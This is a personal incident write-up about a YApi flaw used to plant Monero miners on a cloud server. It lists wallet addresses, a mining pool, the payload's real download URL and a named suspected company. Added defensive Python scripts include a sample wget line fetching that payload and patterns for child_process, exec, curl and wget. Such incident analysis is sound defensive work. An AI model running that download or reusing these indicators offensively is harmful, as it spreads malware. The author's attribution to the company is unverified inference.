A record of the time my server was hijacked for mining
2022-06-26 09:28:00 【gdky005】
The server was hijacked?
Recently, Alibaba Cloud kept warning about various risks. I only handled them briefly and did not pay much attention.
Today I wanted to read a static file from the server, but it kept failing and succeeded only once or twice. The Alibaba Cloud server was always connected, and at one point I suspected the company network. Then the server hung once while I was running a remote build, which meant there had to be something wrong with the server itself.
When I got home, I found that a vulnerability in YApi can lead to mining, so I quickly disabled the YApi-related services.
I suspected there might be leftover files, so a careful check was needed. First, check the file paths in the Alibaba Cloud alert details and delete whatever should be deleted.
1. The first case found:

Following this address, we can see that this is the "cat pool" mining pool, and we get the address of the wallet he collects into.
Cat pool address: https://c3pool.com/cn/

**Unexpectedly, 277 miners were working for it for a period, and it made several hundred yuan.**
**0.0444 = 55 RMB, 0.067/0.00455 + 55 == 976 RMB. Nearly 1,000 yuan, made by using other people's servers to earn money for himself.**
The wallet address is: 43sEd48rjD2TpXjv7ptYWq1XWLGfpRKw25w1XtNd7rQDFpxrtcvu6KrNnmiX2Ui3Zb2rqEmdbGcg4gdW1ptApHGjAc6mqww
It can be monitored later to see how much he makes.
2. Following the trail further, a second miner program was found:


It shows no amount at present.
Another problem was found:


It is someone on an Alibaba Cloud server in Shanghai.
3. A record identical to the first one was found:
43sEd48rjD2TpXjv7ptYWq1XWLGfpRKw25w1XtNd7rQDFpxrtcvu6KrNnmiX2Ui3Zb2rqEmdbGcg4gdW1ptApHGjAc6mqww


3.1 A third case was found:


4. A special case was found:


5. Another case was found:
46n4YeKAjUp2FcJnx8SFEb5CMK3kMRJ9o9MEuCzWtv2VEF5LYeq6TJKSWV3h4sEj4CQiUmsb2dNMEQcKJZJM8zCYFp7wFoy



Having found the malicious programs above, I saved copies of the files locally and removed the processes.
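The manual search above can be repeated across process listings, crontabs and shell history with a small triage script. This is an added example, not code from the original post: it flags the two hosts named on this page and any 95-character base58 string starting with "4", which is the shape of both wallets quoted above (assumed here to be Monero addresses). The sample lines, the `stratum+` schemes and `example.invalid` hosts are constructed.

```python
import re

B58 = "1-9A-HJ-NP-Za-km-z"
# Wallet-shaped token: 95 base58 characters starting with "4", the shape of
# both wallet strings quoted on this page (assumed to be Monero addresses).
WALLET_RE = re.compile(rf"(?<![{B58}])4[{B58}]{{94}}(?![{B58}])")
# Hosts named on the page, plus the generic stratum URL schemes (assumption).
INDICATORS = ("c3pool.com", "zzlxrj.com", "stratum+tcp://", "stratum+ssl://")


def triage(lines):
    """Return [(line_no, reasons, wallets)] for every line that matches."""
    hits = []
    for no, line in enumerate(lines, 1):
        reasons = [i for i in INDICATORS if i in line.lower()]
        wallets = WALLET_RE.findall(line)
        if wallets:
            reasons.append("wallet-shaped string")
        if reasons:
            hits.append((no, reasons, wallets))
    return hits


def wallets_seen(lines):
    """Distinct wallet strings, to tell one operator's miners from another's."""
    return sorted({w for _, _, ws in triage(lines) for w in ws})


# Constructed sample in `ps` / shell-history style, not taken from the incident.
W1 = "4" + "A" * 94
W2 = "4" + "B" * 94
SAMPLE = [
    "root  812  /usr/sbin/sshd -D",
    f"yapi 2291 /tmp/.cache/kworker -o stratum+tcp://pool.example.invalid:3333 -u {W1}",
    "wget https://jhx15.zzlxrj.com/Uploads/image/goods/2021-06-07/mysql.tar.gz",
    f"yapi 2307 ./mysql -o pool.example.invalid:443 -u {W2} -p x",
    "node  990  node server/app.js",
]

if __name__ == "__main__":
    for no, reasons, _ in triage(SAMPLE):
        print(no, ", ".join(reasons))
    print(len(wallets_seen(SAMPLE)), "distinct wallets")
```

Grouping hits by wallet string is what separates the cases above: cases 1 and 3 share one wallet, case 5 uses another.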
Further discovery
All of the domain names download data from https://jhx15.zzlxrj.com/Uploads/image/goods/2021-06-07/mysql.tar.gz. Before that, it must have been an operation performed as a user on the server.


It was you!!!
Zhengzhou continuous Software Technology Co., Ltd. It looks like this needs a deeper dig.

It is associated with so many domain names; at first glance, it is not a serious company.

Now that the company has been found, the contact would be via QQ.

The full mailbox is: [email protected]

Many new domain names have been registered.
With that, the investigation is complete. We'll see what to do about it later.

Another cloud of doubt arises?
The next morning, I found that Alibaba Cloud had raised another alert. I traced it to IPs in Vietnam and Shanghai that were using a lot of memory, and reset the system.
Immediately upgrade YApi to version 1.9.5.
Since you got to me through YApi, I have to check what you did.
These tables can be found in the existing database:


That's how he attacked me
adv_mock and adv_mock_case look a little interesting, so go in and have a look:


Ha, dynamically executed scripts. Hmm, a little interesting.
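To review every stored mock script rather than reading them one by one, the `adv_mock` documents can be exported and screened for scripts that do more than shape a response. This is an added example, not code from the original post or from YApi: the field names `mock_script`, `uid`, `up_time`, `enable` and `interface_id` are assumptions about the collection's layout, and the documents are constructed.

```python
import re

# Assumed field names (not confirmed by the page): adv_mock keeps its script
# in "mock_script"; "uid" and "up_time" identify who saved it and when.
SUSPICIOUS = {
    "module loading": re.compile(r"\brequire\s*\("),
    "process access": re.compile(r"\b(process|child_process)\b"),
    "constructor access": re.compile(r"\bconstructor\b"),
    "command execution": re.compile(r"\b(exec|execSync|spawn)\s*\("),
    "download tool": re.compile(r"\b(curl|wget)\b"),
}


def audit(docs, field="mock_script"):
    """Return one finding per document whose script matches any pattern."""
    findings = []
    for doc in docs:
        script = doc.get(field) or ""
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(script)]
        if reasons:
            findings.append({
                "interface_id": doc.get("interface_id"),
                "uid": doc.get("uid"),
                "up_time": doc.get("up_time"),
                "enabled": bool(doc.get("enable")),
                "reasons": reasons,
            })
    # Enabled entries first, since an enabled script is the one still in effect.
    return sorted(findings, key=lambda f: (not f["enabled"], f["up_time"] or 0))


# Constructed documents shaped like an export of the adv_mock collection.
SAMPLE = [
    {"interface_id": 11, "uid": "7", "up_time": 1624000000, "enable": True,
     "mock_script": "mockJson.errcode = 0; mockJson.data.name = 'demo';"},
    {"interface_id": 42, "uid": "31", "up_time": 1656200000, "enable": True,
     "mock_script": "var cp = process; /* constructed, inert placeholder */"},
    {"interface_id": 43, "uid": "31", "up_time": 1656200100, "enable": False,
     "mock_script": "require('child_process') /* constructed placeholder */"},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The `uid` and `up_time` of each finding point to the account that saved the script and when, which is where to look next for unexpected registrations.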